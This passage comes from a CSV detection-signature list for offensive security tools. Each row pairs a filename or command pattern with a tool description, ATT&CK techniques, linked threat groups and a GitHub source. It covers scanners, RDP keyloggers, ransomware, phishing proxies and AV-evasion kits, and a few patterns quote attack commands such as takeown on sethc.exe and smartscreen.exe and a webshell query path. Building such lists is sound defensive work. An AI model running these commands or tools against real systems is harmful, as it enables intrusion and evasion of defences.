T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - 
Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","60846" "*TailorScan_darwin*",".{0,1000}TailorScan_darwin.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - 
Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","1","#linux","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","60847" "*TailorScan_freebsd*",".{0,1000}TailorScan_freebsd.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - 
menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","60848" "*TailorScan_linux_*",".{0,1000}TailorScan_linux_.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/uknowsec/TailorScan","1","1","#linux","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","60849" "*TailorScan_netbsd_*",".{0,1000}TailorScan_netbsd_.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","60850" 
"*TailorScan_openbsd_*",".{0,1000}TailorScan_openbsd_.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","60851" "*TailorScan_windows_*.exe*",".{0,1000}TailorScan_windows_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - 
supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","60852" "*TakahiroHaruyama/VDR*",".{0,1000}TakahiroHaruyama\/VDR.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","60883" "*take_shellcode.bat*",".{0,1000}take_shellcode\.bat.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","","N/A","","","","60884" "*TakeMyRDP*logfile.txt*",".{0,1000}TakeMyRDP.{0,1000}logfile\.txt.{0,1000}","offensive_tool_keyword","TakeMyRDP","An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/nocerainfosec/TakeMyRDP2.0","1","1","N/A","N/A","N/A","2","104","9","2023-07-27T03:10:08Z","2023-07-03T12:48:49Z","60886" "*TakeMyRDP.cpp*",".{0,1000}TakeMyRDP\.cpp.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","N/A","4","386","63","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z","60887" "*TakeMyRDP.exe*",".{0,1000}TakeMyRDP\.exe.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","N/A","4","386","63","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z","60888" "*TakeMyRDP.git*",".{0,1000}TakeMyRDP\.git.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop 
Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","N/A","4","386","63","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z","60889" "*TakeMyRDP.h*",".{0,1000}TakeMyRDP\.h.{0,1000}","offensive_tool_keyword","TakeMyRDP","An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/nocerainfosec/TakeMyRDP2.0","1","1","N/A","N/A","N/A","2","104","9","2023-07-27T03:10:08Z","2023-07-03T12:48:49Z","60890" "*TakeMyRDP.sln*",".{0,1000}TakeMyRDP\.sln.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","N/A","4","386","63","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z","60891" "*TakeMyRDP.vcxproj*",".{0,1000}TakeMyRDP\.vcxproj.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","N/A","4","386","63","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z","60892" "*TakeMyRDP2.0*",".{0,1000}TakeMyRDP2\.0.{0,1000}","offensive_tool_keyword","TakeMyRDP","An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/nocerainfosec/TakeMyRDP2.0","1","1","N/A","N/A","N/A","2","104","9","2023-07-27T03:10:08Z","2023-07-03T12:48:49Z","60893" 
"*TakeMyRDP-main*",".{0,1000}TakeMyRDP\-main.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","N/A","4","386","63","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z","60894" "*takeown /f ""%systemroot%\System32\smartscreen.exe"" /a*",".{0,1000}takeown\s\/f\s\""\%systemroot\%\\System32\\smartscreen\.exe\""\s\/a.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","60895" "*takeown /f c:\windows\system32\sethc.exe*",".{0,1000}takeown\s\/f\sc\:\\windows\\system32\\sethc\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","60899" "*takeown /f c:\windows\system32\sethcold.exe*",".{0,1000}takeown\s\/f\sc\:\\windows\\system32\\sethcold\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","60901" 
"*TakeOwnershipServiceModificationVariant.exe*",".{0,1000}TakeOwnershipServiceModificationVariant\.exe.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","60902" "*tanc7/EXOCET-AV-Evasion*",".{0,1000}tanc7\/EXOCET\-AV\-Evasion.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","60904" "*Taonn/EmailAll*",".{0,1000}Taonn\/EmailAll.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","N/A","6","8","715","117","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z","60905" "*tarcisio_marinho09@hotmail.com*",".{0,1000}tarcisio_marinho09\@hotmail\.com.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#email #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","60906" "*tarcisio-marinho/cryptomining*",".{0,1000}tarcisio\-marinho\/cryptomining.{0,1000}","offensive_tool_keyword","cryptomining","A Linux Cyptomining 
malware","T1496","TA0009","N/A","N/A","Cryptomining","https://github.com/tarcisio-marinho/cryptomining","1","1","#linux","N/A","7","1","36","15","2023-05-05T02:42:59Z","2018-04-07T03:59:52Z","60907" "*tarcisio-marinho/GonnaCry*",".{0,1000}tarcisio\-marinho\/GonnaCry.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","1","N/A","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","60908" "*target/debug/wstunnel*",".{0,1000}target\/debug\/wstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","60909" "*target/tomcatwar.jsp?pwd=j&cmd=*",".{0,1000}target\/tomcatwar\.jsp\?pwd\=j\&cmd\=.{0,1000}","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/spring-core-rce","1","0","N/A","N/A","N/A","1","50","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z","60910" "*target_reconftw_ipcidr.txt*",".{0,1000}target_reconftw_ipcidr\.txt.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","1","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","60911" 
"*TARGET=evilginx*",".{0,1000}TARGET\=evilginx.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#content","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","60912" "*targetedKerberoast.git*",".{0,1000}targetedKerberoast\.git.{0,1000}","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","N/A","5","442","63","2024-12-16T07:32:14Z","2021-08-02T20:19:35Z","60913" "*targetedKerberoast.py*",".{0,1000}targetedKerberoast\.py.{0,1000}","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","N/A","5","442","63","2024-12-16T07:32:14Z","2021-08-02T20:19:35Z","60914" "*targetedkerberoast_attack*",".{0,1000}targetedkerberoast_attack.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","60915" "*targetedkerberoast_hashes_*.txt*",".{0,1000}targetedkerberoast_hashes_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 
- T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","60916" "*targetedkerberoast_output_*.txt*",".{0,1000}targetedkerberoast_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","60917" "*targetedKerberoast-main*",".{0,1000}targetedKerberoast\-main.{0,1000}","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","N/A","5","442","63","2024-12-16T07:32:14Z","2021-08-02T20:19:35Z","60918" "*TartarusGate-master*",".{0,1000}TartarusGate\-master.{0,1000}","offensive_tool_keyword","TartarusGate","TartarusGate Bypassing EDRs","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/trickster0/TartarusGate","1","1","N/A","N/A","10","6","579","72","2022-01-25T20:54:28Z","2021-11-27T19:46:30Z","60919" "*tarunkant/Gopherus*",".{0,1000}tarunkant\/Gopherus.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60920" "*tas389.ps1*",".{0,1000}tas389\.ps1.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","60921" "*Tasked Beacon to escalate to SYSTEM*",".{0,1000}Tasked\sBeacon\sto\sescalate\sto\sSYSTEM.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
